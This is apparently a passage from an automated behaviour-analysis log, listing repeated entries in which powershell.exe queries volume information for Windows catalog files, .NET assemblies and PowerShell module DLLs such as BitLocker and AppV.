Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
